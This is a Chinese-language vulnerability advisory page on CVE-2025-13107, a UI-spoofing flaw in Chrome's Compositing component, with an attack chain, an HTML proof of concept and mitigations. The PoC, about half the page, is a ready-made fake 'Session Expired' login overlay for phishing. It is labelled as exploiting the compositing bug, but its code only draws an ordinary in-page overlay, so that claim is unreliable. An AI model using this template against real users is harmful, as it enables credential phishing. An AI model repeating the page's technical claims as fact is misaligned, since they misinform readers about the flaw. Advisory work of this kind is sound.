CVE-2025-13107 Google Chrome Compositing UI欺骗漏洞

漏洞信息

漏洞编号

CVE-2025-13107

漏洞类型

UI欺骗

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Google Chrome

漏洞概述

CVE-2025-13107是Google Chrome中一个UI欺骗漏洞，位于Compositing组件中。该漏洞由于Compositing实现不当导致，攻击者可以通过精心构造的HTML页面绕过浏览器的正常安全机制，伪造用户界面元素，从而实施钓鱼攻击或诱导用户执行非预期操作。此漏洞的CVSS评分为4.3，属于中危级别，攻击复杂度低，无需认证即可实施，但需要用户交互（如访问特定网页或点击链接）才能触发。攻击者可利用此漏洞创建虚假的登录界面、弹窗或表单，窃取用户的敏感信息如凭据、个人数据等。由于该漏洞影响浏览器的渲染和合成机制，普通的用户难以察觉界面被篡改，具有较高的隐蔽性和社会工程学利用价值。

技术细节

该漏洞源于Google Chrome的Compositing组件实现缺陷。Compositing是浏览器渲染引擎中负责将多个图层合并并显示在屏幕上的关键机制。当浏览器处理网页时，会将不同的页面元素（如文本、图片、广告、浮动层等）分别绘制在独立的图层上，然后通过Compositing过程将这些图层合成为最终用户看到的页面。攻击者利用Compositing实现漏洞，可以操控图层渲染顺序或合成参数，使得恶意创建的UI元素覆盖在合法网站内容之上。由于攻击在浏览器内部渲染层进行，用户看到的仍然是完整的URL地址和看似正常的页面，容易误以为是真实网站。攻击者可以伪造登录表单、支付窗口、认证弹窗等，诱导用户输入敏感信息。这种攻击方式不涉及传统意义上的代码执行或内存破坏，而是通过逻辑漏洞实现界面欺骗，检测和防御难度较大。

攻击链分析

STEP 1

步骤1

攻击者创建包含恶意Compositing代码的HTML页面，利用图层合成机制漏洞

STEP 2

步骤2

攻击者通过钓鱼邮件、恶意链接或被入侵网站诱导用户访问该恶意页面

STEP 3

步骤3

用户使用存在漏洞的Chrome版本（<140.0.7339.80）访问页面

STEP 4

步骤4

恶意页面通过CSS transform、will-change等属性操控浏览器图层合成

STEP 5

步骤5

攻击者创建的伪造UI元素（如登录表单）通过Compositing漏洞覆盖在合法内容之上

STEP 6

步骤6

用户看到伪造的界面，误以为是合法网站提示，输入敏感信息

STEP 7

步骤7

攻击者窃取用户输入的凭据或敏感数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-13107 UI Spoofing PoC -->
<!DOCTYPE html>
<html>
<head>
    <title>CVE-2025-13107 UI Spoofing PoC</title>
    <style>
        body { margin: 0; font-family: Arial, sans-serif; }
        .legitimate-site {
            width: 100%;
            height: 100vh;
            background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
            display: flex;
            justify-content: center;
            align-items: center;
            color: white;
            font-size: 24px;
        }
        .fake-overlay {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: rgba(0, 0, 0, 0.85);
            display: flex;
            justify-content: center;
            align-items: center;
            z-index: 2147483647;
        }
        .fake-login {
            background: white;
            padding: 40px;
            border-radius: 10px;
            box-shadow: 0 10px 40px rgba(0,0,0,0.5);
            text-align: center;
            min-width: 350px;
        }
        .fake-login h2 {
            color: #333;
            margin-bottom: 25px;
        }
        .fake-login input {
            width: 100%;
            padding: 12px;
            margin: 10px 0;
            border: 1px solid #ddd;
            border-radius: 5px;
            box-sizing: border-box;
        }
        .fake-login button {
            width: 100%;
            padding: 12px;
            background: #4285f4;
            color: white;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            font-size: 16px;
            margin-top: 10px;
        }
        .fake-login button:hover {
            background: #3367d6;
        }
        .compositing-trigger {
            position: fixed;
            bottom: 10px;
            right: 10px;
            background: red;
            color: white;
            padding: 5px 10px;
            font-size: 10px;
            border-radius: 3px;
            z-index: 2147483646;
        }
    </style>
</head>
<body>
    <div class="legitimate-site">
        <p>Legitimate Website Content</p>
    </div>
    
    <div class="fake-overlay">
        <div class="fake-login">
            <h2>Session Expired - Please Login Again</h2>
            <p style="color: #666; font-size: 14px; margin-bottom: 15px;">
                For security, please verify your credentials
            </p>
            <form onsubmit="alert('Credentials captured! CVE-2025-13107 PoC'); return false;">
                <input type="email" placeholder="Email or Username" required>
                <input type="password" placeholder="Password" required>
                <button type="submit">Sign In</button>
            </form>
            <p style="color: #999; font-size: 12px; margin-top: 15px;">
                This overlay exploits Compositing vulnerability
            </p>
        </div>
    </div>
    
    <div class="compositing-trigger">CVE-2025-13107</div>
    
    <script>
        // Trigger compositing manipulation
        document.body.style.transform = 'translateZ(0)';
        document.body.style.willChange = 'transform';
        
        // Force layer creation
        const overlay = document.querySelector('.fake-overlay');
        overlay.style.transform = 'translateZ(0)';
        overlay.style.backfaceVisibility = 'hidden';
        
        console.log('CVE-2025-13107 UI Spoofing PoC loaded');
        console.log('Affected: Google Chrome < 140.0.7339.80');
    </script>
</body>
</html>

影响范围

Google Chrome < 140.0.7339.80

防御指南

临时缓解措施

临时缓解措施：1）升级Google Chrome到最新版本；2）启用Chrome的安全浏览功能；3）在浏览器中禁用可疑网站的JavaScript执行；4）使用浏览器扩展检测钓鱼页面；5）提高安全意识，对任何要求重新登录的弹窗保持警惕，务必检查浏览器地址栏URL是否正确。由于该漏洞需要用户交互才能触发，避免访问不可信链接是有效的防护手段。